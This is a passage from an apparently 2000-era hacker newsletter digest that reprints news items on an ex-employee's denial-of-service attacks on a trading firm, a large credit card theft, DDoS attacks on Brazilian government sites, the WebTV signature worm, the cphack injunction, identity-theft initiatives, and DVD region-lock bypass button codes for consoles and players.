"It's the only referral we've ever had on this kid. So if he quits, and pays back some money, that will be about it," Hemeyer said.
Carol Huang is an APBnews.com staff writer (carol.huang@apbnews.com).

@HWA

34.0 HNN:Mar 16th:Former Employee Arrested For Attack On Company
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by no0ne

31 year old Abdelkader Smires was charged in United States District Court in Brooklyn with computer-related fraud and remained in custody pending a bail hearing on Friday. Smires is being accused of causing his former company, Internet Trading Technologies, Inc. (ITTI), which provides software that allows market-makers to conduct online securities transactions, to shut down several times since last Thursday by directing coordinated attacks against the firm's computer networks.

NY Times
http://www.nytimes.com/aponline/a/AP-Cyber-Spat.html

C|Net
http://news.cnet.com/news/0-1007-200-1573627.html?tag=st.ne.1002.thed.1007-200-1573627

Associated Press - via San Jose Mercury News
http://www.sjmercury.com/breaking/docs/073358.htm

NYTimes: pay

-=-

C|Net

ITTI employee arrested in hacker attack
By Bloomberg News
March 15, 2000, 4:20 p.m. PT

An employee of Internet Trading Technologies, a provider of trade-execution services for securities firms, was arrested yesterday and charged with attacking ITTI computers and causing interruptions in its services this week, the U.S. Attorney's Office in Brooklyn said.

The employee, Abdelkader Smires, a database programmer, launched a series of data transmissions intended to cause the firm's computers to crash after he became involved in a dispute with his employers, according to U.S. Attorney Loretta Lynch. He was arraigned in federal court in Brooklyn yesterday and ordered held without bail, Lynch said.

ITTI's software system allows securities firms to trade Nasdaq stocks online, a representative for the company said. It is marketed by other firms, such as Trimark Group, under their own brand names, she said.

The system links small broker-dealers with market-makers like Knight/Trimark, Mayer & Schweitzer and others, a Knight/Trimark spokesman said. Firms use it so they don't have to install and maintain direct hardware and software connections to market-makers.

Smires' attacks caused "significant interruption of ITTI's trade execution over the past three business days," Lynch said. "If the attacks had continued to cause denial of service, the viability of ITTI would have been threatened, resulting in major disruption of trading on the Nasdaq," she added.

The U.S. Secret Service's Electronic Crimes Task Force, which is a cooperative effort of 25 local, state and federal agencies and 45 private companies, helped trace Smires' computer attacks, said Bob Weaver, a Secret Service representative.

Conflict developed between Smires and his bosses when ITTI's chief development officer, who had hired Smires and was his supervisor, resigned March 6, according to an affidavit filed in the case by Secret Service Agent Peter Cavicchia.

The firm then hired systems consultants to help fill the gap created by the departure, but Smires and another, unidentified programmer refused to help train the newcomers on ITTI's systems, according to the affidavit.

Smires and the other programmer then told the firm's executives that they would quit unless they were given "more employment security, a greater salary and a greater equity interest in the firm," Cavicchia said. ITTI responded by offering them one-year employment contracts, raises and stock options, he said.

Smires and the other programmer nevertheless decided to resign, according to the affidavit. The pair demanded "$70,000 immediately, 50,000 stock options and more substantial salary increases," Cavicchia said. A "tentative agreement" was reached March 8, Cavicchia said.

The next day, Smires and the other programmer backed out of the agreement, demanded more favorable terms and said ITTI executives should call them only if the firm agreed to the specific counter-offer, Cavicchia said. ITTI didn't call.

Later on March 9, the attacks on ITTI's system began. The attacks continued Friday, Monday and yesterday, according to the affidavit, shutting down ITTI's computers for a total of about five hours.

"While one of the attacks was occurring, ITTI computers revealed the Internet Protocol address of the attacking computer," enabling employees to trace it to a building on the Queens College campus in Flushing, New York, where Smires is an instructor, Cavicchia said.

Secret Service agents were told that the particular Queens College computer from which the attack was launched was being used by Smires at the time, the affidavit said. After his arrest, Smires admitted that he was responsible for the March 13 and March 14 attacks, Cavicchia said.

Smires also waged some of his attacks from a Kinko's copy shop in Manhattan, Lynch said.

Copyright 2000, Bloomberg L.P. All rights reserved.

-=-

Assoc.Press; 404

@HWA

35.0 HNN:Mar 16th:PlayStation2 can Play US DVD
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by acopalyse

Some DVDs released for the North American Region can be played on PlayStation2 consoles in England. Pressing buttons in a certain sequence while the PlayStation2 boots up into DVD mode can sometimes allow Region 1 CDs to be played on the Region 2 device. (Wonder if this will have any effect on the DeCSS lawsuit?)

The Register UK
http://www.theregister.co.uk/000315-000017.html

Gaming Intelligence Agency
http://www.thegia.com/news/0003/n11a.html

Register;

Posted 15/03/2000 5:04pm by Linda Harrison

PlayStation 2 can play US DVDs - apparently

Gaming boffins claim to have found a way to play American DVDs on PlayStation 2 consoles.
Three codes have surfaced which make it possible to play Region 1 (North America) DVDs on the PlayStation 2 -- a Region 2 (Europe, Japan and Asia) DVD player.

Like console video games, DVDs are usually fixed by vendors so they can only operate within specific world markets. It was previously believed the PlayStation 2, launched solely in Japan, could play only Region 2 DVDs.

But the Gaming Intelligence Agency's Web site this week claimed to have found the codes needed to overcome this inconvenience. These codes do not work every time -- a hitch believed to be linked to how hard the Dual Shock 2's buttons are pressed.

"All three codes should be entered when the PlayStation 2 DVD bootup sequence begins fading to black... If you get a region failed message, don't despair; just try again. The same disc will work some times and not others," it reports.

"While these codes certainly leave room for improvement, the advent of any region bypass is good news for system importers and DVD fans," thegia.com adds.

Sony Computer Entertainment in the UK chose not to comment.®

-=-

GIA;

Play American DVDs on Japanese PlayStation 2 [03.11.00]
» Simple controller codes make it possible.

Two simple controller codes have recently surfaced that make it possible to play Region 1 (North America) DVDs on the PlayStation 2, a Region 2 (Japan and Asia) DVD player. Much like console videogames, DVDs are region encoded to dissuade consumers from importing titles from outside of the country. It was previously believed that the PlayStation 2 would only play Region 2 DVDs.

These codes currently only work with about partial frequency. We are currently unsure why they do not work 100% of the time; we believe they may be dependent on how hard the user presses the Dual Shock 2's analog buttons. If you own a PS2 and Region 1 movies, the GIA is interested in hearing about your experiences with the code, especially if you find a way to make Region 1 movies play with greater frequency.
Please e-mail staff@thegia.com with the movie tested, code used, and the tries / success ratio.

All three codes should be entered when the PlayStation 2 DVD bootup sequence begins fading to black. The buttons should be held until either the DVD movie starts up (1 line of Japanese) or a "region failed" message appears (2 lines of Japanese). If you get a region failed message, don't despair; just try again. The same disc will work some times and not others.

The first code comes from the GIA's own J.T. Kauffman; it is apparently circulating Japanese message boards and web sites. The code is: hold down L1, Circle, and Select. This code has worked with both the Dual Shock 1 and 2 with about 40% accuracy.

The second code comes from a friend of the GIA known as Barubary. The code is: press in L3 (the left analog stick) straight and hard. This code does not work with the Dual Shock 1, but works with the Dual Shock 2 with about 60% accuracy.

The newest, third code comes from GIA friend Nick "Rox" Des Barres. Nick reports that this code works an astounding 95% of the time. The instructions follow:

  1. Insert a first-generation PlayStation pad (i.e., not an analog controller) in Control Port 1 of the PS2.
  2. Insert DVD.
  3. Hold UP on the pad until the DVD menu appears.
  4. Highlight the play icon and select it.

Nick adds, "I tried this on 20 or so DVDs, and it booted all of them. Two or three would not play. You could access the menus, however. It should be noted I was using a Japanese first-generation PS1 pad, though I can't imagine why it wouldn't work with American ones."

While these codes certainly leave room for improvement, the advent of any region bypass is good news for system importers and DVD fans. The GIA will keep you posted on any new developments on the PS2 DVD front.
@HWA

36.0 HNN:Mar 16th:ISTF Releases Security Recommendations
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Chris

The Internet Security Task Force, a conglomeration of big name tech companies, ISPs and other e-business firms, has produced a "vendor neutral set of recommendations in understandable language" about the problems and solutions in internet security. The paper doesn't say anything new, but because it was released by "credible" vendors and not "the evil underground" some suits might finally pay attention. But then again, maybe not.

Initial Recommendations For Conducting Secure eBusiness
http://www.ca.com/ISTF/recommendations.htm

@HWA

37.0 HNN:Mar 17th:485,000 Credit Cards Numbers Stolen, Found on Gov Computer
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench

A file containing credit card numbers, expiration dates, names and addresses was found last year on a US government website. The thief has been traced back to a European country but it has not been revealed which one. It has also not been revealed which online service the numbers came from or which government agency was unwittingly storing the numbers. The incident has been confirmed by the Secret Service but first came to light when a bank employee notified reporters. The bank received the notice of the credit card heist from Visa however failed to notify its card holders.

MSNBC
http://www.msnbc.com/news/382561.asp

Vast online credit card theft revealed

Hacker hid data on 485,000 cards on U.S. agency's Web site

By Mike Brunker
© MSNBC

March 17 — In the largest known case of cybertheft, a computer intruder stole information on more than 485,000 credit cards from an e-commerce site and then secretly stored the massive database on a U.S. government agency's Web site, MSNBC.com has learned.
Credit card companies notified financial institutions, but many of the compromised accounts remain open to this day because the banks neither closed them nor notified customers of the theft.

THE HEIST occurred in January 1999, but only a few details have previously been made public. The scope of the crime emerged in a letter dated Dec. 27 from Visa USA to member financial institutions. Jim Macken, a Secret Service spokesman, confirmed that the incident had occurred and added some details in an interview on Thursday.

The Visa letter, a copy of which was provided to MSNBC by a source in the banking industry, quotes federal authorities as saying that the credit card information — including expiration dates and cardholder names and addresses — was stolen from an Internet retail site by a hacker. It said the store of data on Visa, MasterCard, American Express and Discover cards was discovered on an unspecified government computer system during an audit.

The letter did not say when the stolen data was found, but Macken said it was discovered before March 1999 on the Web site of a U.S. government agency, which he declined to identify.

"This government Web administrator noticed that a lot of the memory was chewed up for no reason, so he checked and found the file (containing the stolen data)," he said.

NO EVIDENCE OF FRAUDULENT USE

There was no evidence that any of the cards were used to commit fraud and some of the accounts were not active, Macken added.

The letter said that authorities had not identified the thief, but Macken said investigators have since traced the criminal to Eastern Europe. The investigation is ongoing and involves diplomatic contacts with the country in question, he said. The Internet retail site from which the data was stolen has also since been identified, but Macken declined to name it.
It was unclear why the thief hacked the government Web site and stored the data there, Macken said, though he allowed that the act might have been the online equivalent of thumbing one's nose at U.S. authorities.

As MSNBC reported last week, U.S. authorities have so far been stymied in their attempts to prosecute credit card thieves and fraud rings based in the former Soviet bloc nations and Asia.

Secret Service officials testified about some details of the case before Congress early last year to demonstrate the peril that computer hackers pose to online commerce, Macken said. Their comments generated little coverage, however, and the scope of the case is only now becoming clear.

EFFORT TO HIGHLIGHT INACTION

The copy of the letter from Visa was obtained by MSNBC from an employee at the Navy Federal Credit Union, in Merrifield, Va., the world's largest credit union with 19 million members. The letter was provided, the source said, to highlight the fact that some financial institutions are failing to act to protect consumers when there is evidence that their credit card information has been stolen.

Officials at the credit union took no action to warn customers whose account numbers were among those stolen by the hacker, said the source, who spoke on condition of anonymity. Instead, they ordered a "spot check" of 50 to 100 accounts and then decided that no further action was necessary, the source said.

The source said the same procedure was followed two weeks later, when Visa alerted the institution of the theft of data on 300,000 credit cards from the CD Universe Web site — the biggest theft of credit card data over the Internet that previously had been made public.

"It was decided that ... it would be too much of an inconvenience and too costly to shut down the accounts and issue new numbers," said the source. "It was deemed not the credit union's responsibility."
The credit union source said that fraudulent charges have subsequently appeared on some of the accounts that were compromised, though it is impossible to definitively link the fraud to the theft.

CREDIT UNION RESPONDS

In a statement issued Friday in response to MSNBC.com's story, Navy Federal Credit Union officials did not challenge the assertion that they did not warn customers of the theft. But they denied that cost or inconvenience were factors in the decision.

"When we received notification of this problem from VISA USA, we reviewed our systems and were confident that all appropriate controls were in place to protect our members' financial welfare," said Tom Steele, a credit union vice president in charge of the credit card division. "Additional checks of the 1,500 Navy Federal credit card accounts identified by VISA USA confirmed that the steps we had taken safeguarded every cardholder — we have also not seen any increase in fraud losses."

The statement also indicated that no Navy Federal cardholders have been victims of identity theft as a result of the heist.

Calls to American Express and a half dozen major banks seeking information on their response when notified of the theft were not returned.

Scott Lynch, a spokesman for Visa USA, said he could not comment on the case. Nor would he explain why Visa didn't notify its members of the theft until December.

Alicia Zatkowski, a spokeswoman for Discover Financial Services, said the firm's fraud investigators were not aware of such a case.

Vincent DeLuca, vice president of fraud control at MasterCard International, said, "We are aware of some cases but we're not at liberty to talk about any ongoing investigations."

Several financial institutions ordered the wholesale closure and replacement of cards that were compromised in the CD Universe case, which also remains under investigation. Such across-the-board replacement programs were well publicized in an effort to assure online consumers.
Banks and credit card companies often point out that consumers are responsible only for the first $50 of fraudulent online purchases — and that is nearly always waived. But stolen credit card information can be used to commit fraud against unsuspecting Internet merchants, who in most cases bear the cost of the crime, or for identity theft — a practice in which criminals use personal data to obtain new credit, borrow money or make big-ticket purchases.

The Treasury Department on Wednesday held a two-day national summit on identity theft to focus attention on what Treasury Secretary Lawrence Summers described as "a growing and major criminal threat."

At the session, victims said that while they did not ultimately have to pay for the losses run up in their names, identity theft is by no means a victimless crime.

"It has been sheer hell, and I do mean hell," said Darlene Zele, a Rhode Island hospital worker who was one of the victims who testified about years of struggling to repair the havoc wrought on their credit records. "At this point, after five years, it's still not over."

Got a tip about the use or abuse of credit cards online? Write to tipoff@msnbc.com.

@HWA

38.0 HNN:Mar 17th:Brazil Gov Sites Suffering Under DDoS Attacks
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by webmaster

A group called DDoS-BR is spreading denial of service attacks against Brazilian government networks. The Brazilian Supreme Court and the National Telecommunications Agency web sites have been shut down for most of the week due to the attacks. The Brazilian authorities are looking forward to legislation that will soon be approved which might give the federal police enough power to investigate and arrest electronic criminals. (Hopefully they have the knowledge to use that power wisely.)

SecureNet - In Spanish (correction: Portuguese) ...
http://www.securenet.com.br/cgi-bin/news?id=15030003

@HWA

39.0 HNN:Mar 17th:Secret Service Harassing Bernie S Again
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by macki

Five years to the day after Bernie S. was arrested at gunpoint and subjected to nearly 17 months of imprisonment by the United States Secret Service, agents of the USSS have again begun some kind of cat and mouse game, the nature of which has yet to be revealed.

2600
http://www.2600.com/news/2000/0317.html

SECRET SERVICE HARASSING BERNIE S AGAIN
03/17/00

Five years to the day after Bernie S. was arrested at gunpoint and subjected to nearly 17 months of imprisonment by the United States Secret Service, agents of the USSS have again begun some kind of cat and mouse game, the nature of which has yet to be revealed.

A Special Agent from the Secret Service showed up unannounced at Bernie's workplace and told his employer they wanted to question Bernie, who happened to be out sick that day. When Bernie returned to work the following day and discovered the Secret Service wanted to talk to him, he surprised the agent by calling him. What followed was an extremely strange and circular conversation.

At first the SS agent wouldn't talk to him at all. Then he called Bernie back and said they needed to talk with him at his home at 7am the next morning. When Bernie explained he was just getting over a serious illness and that this was an unreasonable hour, the agent suggested 6am. Bernie repeatedly offered to answer their questions at several neutral locations, but they said any place other than his home was unacceptable. Bernie told them he had nothing to hide, but that he was not comfortable having Secret Service agents poking around inside his house and that they would have to get a warrant before he'd let them in. The agent then said he had to go and would talk to him later.
About ten minutes later, a second, more polished, SS agent called Bernie and continued trying to persuade him to let them inside his home. The agent tried to goad Bernie by implying he must have something to hide, and that if he didn't then there was no reason why they shouldn't be allowed inside his home. At this point, Bernie tried to explain by saying if you asked 100 people on the street if they'd want federal agents in their living room and bedroom, almost everyone would say no and that he was no exception. The SS agent disagreed, saying people have no legitimate fears about such a visit.

Bernie repeatedly tried to get the SS agents to tell him what they wanted. Finally, the second agent said, "I need to check to see if your telephone and Cable TV wiring is hooked up properly." This preposterous claim made Bernie actually laugh out loud. But as a further gesture of cooperation, Bernie offered to allow Bell Atlantic and Comcast Cable TV technicians to inspect his house wiring for them. The SS agents said that, too, would be unacceptable.

It became clear the SS agents were simply trying anything they could to get a foot in his door. Needless to say, after Bernie's previous horrendous experience with the Secret Service, their feet are not welcome in his home. He then gave them his attorney's name and telephone number and told them to address future inquiries directly to his lawyer.

So what is this all about? We don't know yet, but clearly something is up. And the way the Secret Service has played sick games with people's lives in the past, we felt it would be wise to alert everyone now so we can all keep a closer eye on them before they try any further outrageous actions under the veil of secrecy.

@HWA

40.0 HNN:Mar 17th: Secret Service to Work with Citicorp to Fight Fraud
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench

The U.S.
Secret Service and Citicorp, a unit of New York-based Citigroup Inc., are working together to develop a pilot program to fight identity theft and other types of e-commerce fraud. The program will devise a strategy to identify suspicious e-commerce activities, including forged identities and other schemes used to commit bank and credit fraud.

Computer World
http://www.computerworld.com/home/print.nsf/all/000316C9BE

US Treasury Dept. - Press Release
http://www.ustreas.gov/press/releases/ps465.htm

Computer World;

Secret Service, Citicorp team to fight e-commerce fraud

U.S. Treasury Department announces new initiatives to combat identity, other types of e-commerce fraud

By Linda Rosencrance
03/16/2000

The U.S. Secret Service and Citicorp, a unit of New York-based Citigroup Inc., are working together to develop a pilot program to fight identity theft and other types of e-commerce fraud, according to a statement issued by the U.S. Treasury Department.

The announcement was made at the two-day National Summit on Identity Theft convened by Treasury Secretary Lawrence H. Summers yesterday. The summit includes more than 150 participants from federal, state and local government agencies; financial institutions; credit-card companies and reporting agencies; as well as identity theft victims and consumer advocacy groups.

"Criminals are exploiting new technologies to make a significant profit from an old crime," Summers said in the statement. "We will continue to work with the private sector to strengthen our efforts to combat this threat."

The program being developed by the Secret Service and Citicorp will devise a strategy to identify suspicious e-commerce activities, including forged identities and other schemes used to commit bank and credit fraud.

At yesterday's summit, Summers also said that the Secret Service is developing a computer-based training program to help law enforcement officials handle financial crimes.
-=-

Press Release;

TREASURY NEWS
FROM THE OFFICE OF PUBLIC AFFAIRS

FOR IMMEDIATE RELEASE
March 15, 2000
LS-465

TREASURY CONVENES IDENTITY THEFT SUMMIT

Treasury Secretary Lawrence H. Summers convened a two-day National Summit on Identity Theft today and announced four new initiatives targeted at cracking down on the increasing threat of identity theft.

"Criminals are exploiting new technologies to make a significant profit from an old crime," said Treasury Secretary Summers. "We will continue to work with the private sector to strengthen our efforts to combat this threat."

Called for last year by President Clinton, the Summit will address the prevention of identity theft, remediation and enforcement efforts with the public and private sector. The Summit will consist of a series of panels and more than 150 participants from federal, state and local government agencies, financial institutions, credit card companies and reporting agencies, as well as identity theft victims, consumer advocacy groups and private sector representatives.

The four new Treasury initiatives to help combat identity theft include:

  - Skimming and counterfeit check databases currently used to identify common suspects, defendants of identity theft, and address criminal trends prevalent in financial crimes today. These databases were developed and are maintained by the U.S. Secret Service in partnership with the financial industry;

  - A computer-based training module developed by the U.S. Secret Service that will focus on financial crimes and all pertinent statutes including identity theft, and be made available within the agency as well as local and state law enforcement officials throughout the U.S.;

  - A pilot program, developed by the U.S. Secret Service and Citicorp, to help identify suspicious activity on electronic commerce.
    The program will attempt to develop a protocol for the identification of identity theft and other schemes used to commit bank fraud, credit fraud and money laundering within electronic commerce and the immediate notification of law enforcement authorities; and

  - Forums and mini-conferences to maintain a dialogue between the private and public sector.

Treasury's National Summit on Identity Theft is the first national level conference involving law enforcement, victims, industry and nonprofits interested in the issue.

@HWA

41.0 HNN:Mar 17th:Computer History Lecture Series
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by McIntyre

The Computer Museum History Center, a non-profit entity dedicated to the preservation and celebration of computing history, will be having a lecture series entitled "Early Computer Crime". Speakers include Whitfield Diffie, John Markoff, Peter Neumann and Cliff Stoll. The Lecture will be held on Thursday, March 23, 2000 at NASA Ames Research Center Auditorium, Moffett Field, Mountain View, CA. It is requested that RSVPs be received by Monday March 20. (Sounds like fun. I would like to cheer some of the speakers and heckle others.)

The Computer Museum
http://www.computerhistory.org/events/earlycrime_03232000/

@HWA

42.0 HNN:Mar 17th: Australian Police To Increase Online Presence
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by William Knowles

Australian Federal Police Commissioner Mick Palmer said that in an effort to get better training for the people they already have and in an effort to attract more qualified applicants the Police will conduct a staff exchange with private industry. The commissioner will also establish an Electronic Crime Steering Committee to evaluate Australia's capacity to fight electronic crime and will develop an Australian Law Enforcement Electronic Crime Strategy by mid summer.
The Age
http://www.theage.com.au/breaking/0003/17/A15120-2000Mar17.shtml

Police to step up fight against e-crime

Source: AAP | Published: Friday March 17, 3:38 PM

Police are set to recruit computer boffins in a bid to boost the fight against so-called e-crime.

The potential to commit crimes using computers and other information technology was one of the greatest problems ever to face law enforcement, Australian Federal Police Commissioner Mick Palmer said today.

Speaking at the end of a week-long conference of police commissioners from Australia, New Zealand, Fiji and Papua New Guinea, Commissioner Palmer said a staggering 900 million people would be using the Internet by the end of this year.

'People who abuse these technologies have the capacity to commit offences on a global basis, with complete anonymity, with speed and on a scale not previously encountered,' Commissioner Palmer told journalists.

Credit card fraud, electronic vandalism, terrorism, electronic money laundering and tax evasion are some examples of electronic crime.

'The capacity of properly organised, electronic based crime to undermine the financial stability of small and medium sized countries is very real,' Commissioner Palmer said.

A major problem for police is how to attract personnel with enough technical expertise to fight this new crime. Commissioner Palmer said already police recruitment and selection was becoming more flexible.

'Clearly some of the technical skills that we are going to need ... come at a very high cost,' he said. 'People ... in that industry are earning a lot of money and that makes the partnerships with business and the wider business community very important.'

Police will be looking to exchange staff with private industry to gain the skills necessary, probably on short term, project based arrangements. Commissioner Palmer said discussions and negotiations had already begun on this issue and Commonwealth Bank CEO David Murray addressed the commissioners.
'We will be recruiting people from the coalface for short periods of time, we are going to be sharing resources between ourselves and the wider partnership both in the private and public sense.'

The commissioners agreed to establish an Electronic Crime Steering Committee to evaluate Australasia's capacity to fight electronic crime. It will develop an Australasian Law Enforcement Electronic Crime Strategy by the end of June.

@HWA

43.0 HNN:Mar 17th:Apex DVD Defeats Region and Macrovision
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Sciri

Hot on the trail of the PlayStation2 being able to play Region 1 discs is the Apex AD-600A, a DVD/VCD/CD/MP3 player that can disable CSS, Region and Macrovision settings after entering a simple code (Preferences -> Step -> Prev Track -> Next Track).

Review of the Apex-600A
http://uberauk.epinions.com/elec-review-10C9-40ABFE-388DCD5F-bd3

Nerd Out
http://www.nerd-out.com/

@HWA

44.0 HNN:Mar 20th:First Malicious Code Directed at WebTV
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Hal0

Microsoft is working on a patch of its service to counteract malicious programming code that overloads WebTV newsgroup discussions with fake postings. While the malicious code self-replicates like a virus, Microsoft insists on calling it malicious code. The code appends itself to a WebTV user's signature file and then cross-posts itself to numerous newsgroups.

Wired
http://www.wired.com/news/technology/0,1282,35045,00.html

WebTV's 'Non-Virus' Virus

by Chris Oakes
3:00 a.m. Mar. 18, 2000 PST

Although it prefers to call the trouble a "malicious code," WebTV has experienced its first virus.

Parent company Microsoft is working on a patch of its service to counteract malicious programming code that overloads WebTV newsgroup discussions with fake postings.
"Newsgroups are starting to flood with junk posts, and you can't post," said Brian Bock, editor-in-chief of Net4TV Voice, an online publication focusing on Internet services via television. WebTV users first reported the problem to Net4TV.

Bock said the virus -- a first for the closed, non-PC WebTV system -- is like the renowned PC virus Melissa. The similarity is that it self-replicates, he said. But this virus does it by altering signatures that appear at the bottom of WebTV user's Usenet messages.

"When another WebTV user runs across [an infected message], it writes the virus into their email signature," he said. "Then when they go make a Usenet posting, it cross-posts. They end up posting to a whole bunch of different news groups."

The result is the multiplication of junk messages in discussion forums until discussions are disrupted completely because the system's maximum number of viewable messages is reached.

Microsoft was extremely reluctant to call the problem a virus.

"It's not a virus," said Microsoft spokeswoman Claire Haggard. "There's never been a virus on WebTV."

Then what is it? Haggard said the problem was malicious code in WebTV's Usenet posting system. The company took issue with the description of the code as "self-replicating," saying it had to be "manually" inserted in Usenet posts and didn't self-replicate.

Furthermore, Haggard said the multiplying Usenet messages did not involve the exploitation of a user's signature.

Bock said the virus does make use of an existing flaw in the service's email system. That hole is exploited along with a WebTV code for posting messages, Bock said. The issues are separate, Haggard said.

In any case, the problem gets awfully close to meeting the conventional definition of virus: a malicious code that, once installed, performs usually undesirable tasks on the victim's computer.
In most technical definitions, self-replication is not a prerequisite, although the Merriam-Webster definition of virus does include self-replication: "A computer program usually hidden within another seemingly innocuous program that produces copies of itself."

Virus or not, manual or self-replicating, the malicious code will be patched, hopefully by next week, the company said. Meanwhile, WebTV will be removing the junk posts.

Haggard said the company has only heard from 14 users inquiring about the problem. She said the company plans a regular update of its client and server software soon, and that "the upgrade will be made immune from such hacker problems."

@HWA

45.0 HNN:Mar 20th:Liberia Claims Attack In CyberWar
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench

President Charles Taylor of Liberia has claimed that his country is under attack in a cyber war but failed to say by whom. He made the statement after his government shut down two independent radio stations and their related web sites. Amnesty International and the US State Department have vigorously protested the station closings.

Wired
http://www.wired.com/news/politics/0,1283,35016,00.html

'Cyber War' in Liberia

Reuters
7:00 a.m. Mar. 17, 2000 PST

MONROVIA -- President Charles Taylor of Liberia, reacting to criticism of the government's closure of two radio stations, said a "cyber war" had been declared on his country.

"A cyber war has been declared on Liberia and the government is doing everything possible to fight back," he said on Thursday at his Executive Mansion after signing into law seven bills.

He did not say who was waging this war.

Star, an independent radio station that was closed down on Wednesday, had an Internet news service popular with Liberians abroad that was also closed.
The government justified the closures by saying that "agents provocateurs" were using the news media, especially radio stations, to create security problems.

"The government took the action to prevent an outbreak of another war which could be caused by negative broadcasts to create hatred among the Liberian people through hate messages," Taylor said.

Taylor's election in 1997 formally ended a civil war that he started in December 1989.

The U.S. government joined human rights groups, local media, and the Press Union of Liberia in protesting against the closures.

"The United States vigorously protests the unwarranted closure of these two radio stations and calls on the Government of Liberia to reopen them immediately, without conditions, and to return the confiscated equipment," the U.S. State Department said in a statement.

Rights group Amnesty International has linked the closure of Star to a March 13 broadcast it made about a U.S. State Department report on human rights in Liberia.

Star was established in 1997 by the Hirondelle Foundation, a Swiss-based non-governmental organization, with the help of the United States Agency for International Development.

The second station, Radio Veritas, is run by the Roman Catholic Church. The government suspended the station but said it could start operating again if it provided a written assurance it would broadcast only religious material.

The Catholic Archbishop of Monrovia said Veritas had a constitutional right to broadcast.

"It is our constitutional right to disseminate information to the public and if we abuse the right, let the courts deal with us, not the executive," Archbishop Michael Kpakala Francis said in a statement released late on Thursday.

"We will not give any commitment to the government of Liberia that will restrict us to religious programs," he added, denying that Veritas' license restricted it to religious broadcasts.
@HWA

46.0 HNN:Mar 20th:Judge Bans Anti-Filter Software
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Aj

U.S. District Judge Edward F. Harrington has granted an injunction requested by Microsystems Software Inc. to prevent distribution of cphack. Cphack was designed to bypass the surfing restrictions used by CyberPatrol as well as list every web site blocked by the software. The Judge's decision effectively blocks anyone from distributing the software. There were no defendants present at the hearing; the next hearing is scheduled for March 27th. (This could be a rather serious threat to people's right to reverse engineer and to even write software.)

MSNBC
http://www.msnbc.com/news/383603.asp

Associated Press - via Washington Post
http://www.washingtonpost.com/wp-srv/aponline/20000317/aponline133352_000.htm

Porn Software Injunction Issued
By Martin Finucane
Associated Press Writer
Friday, March 17, 2000; 1:33 p.m. EST

BOSTON –– A federal judge Friday ordered a halt to the distribution of a computer program that allows children to bypass software designed to keep them away from Internet pornography.

Microsystems Software Inc. of Framingham, which sells the widely used "Cyber Patrol" filtering software, sued two computer experts who distributed the bypassing software via the Internet. The software, called "cphack," also discloses a list of sites that are blocked by the Cyber Patrol program.

U.S. District Judge Edward F. Harrington ordered Matthew Skala, a self-described cryptography buff who attends the University of Victoria in British Columbia, and Eddy L.O. Jansson, believed to be living in Sweden, to stop spreading the "cphack" program.

The judge also blocked distribution of the "cphack" software by anyone working with them. Microsystems attorney Irwin Schwartz said the judge's order extended to any "mirror" Web sites, where the program may have been copied and made available.
Another hearing is set for March 27 on the case.

Skala and Jansson were not represented at Friday's hearing, and they did not immediately return e-mails seeking comment.

Microsystems has said in its legal filings it would suffer "irreparable harm" from the publication of the bypassing software, which it said sought to destroy the market for its product by rendering it ineffective.

"The practical effect is that ... children may bypass their parents' efforts to screen out inappropriate materials on the Internet," according to the filing made this week.

Free speech advocates criticized the company's move to block distribution of the software.

Peter Junger, a law professor at Case Western Reserve University in Cleveland and an advocate of free speech on the Internet, said it "looks like a rather horrifying challenge to people's right to write software" and to "reverse-engineer" software, which means figure out how it works.

"The idea that one can prevent reverse-engineering of software and publishing the results of that reverse-engineering strikes me as a very dangerous restriction on free speech," he said before the judge's ruling.

Chris Hansen, a senior lawyer with the national office of the American Civil Liberties Union, said there might be debate about whether distributing the bypass software was legal, but that the ACLU agreed with at least one role of the software – publicizing the list of blocked sites.

"Parents who want to install these products ought to be able to do so," he said, adding, "How can you, as a parent, make an intelligent decision (on filtering software) if the product won't tell you what they're blocking?"

© Copyright 2000 The Associated Press

@HWA

47.0 HNN:Mar 20th:We Spy To Prevent Bribes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond

A former Director of Central Intelligence, R. James Woolsey, has written a story about why the United States spies on its allies.
The primary reason given is to prevent bribery so that US companies can compete on an even playing field. (Sorry but I don't buy it, that is too much power for such a simple purpose but I guess the ends justify the means for the US Government. So why can't US citizens spy on their own government to make sure they are complying with the law? Where are the checks and balances?)

Wall Street Journal - via Cryptome
http://cryptome.org/echelon-cia2.htm

17 March 2000. Thanks to DB.

We look forward to seeing and hearing James Woolsey and Duncan Campbell openly debate this controversy, in Congressional hearings, on global TV, the Internet, MilNet and IntelNet -- and all the Echelon surveillance stations based in countries of those who "can't compete with the US."

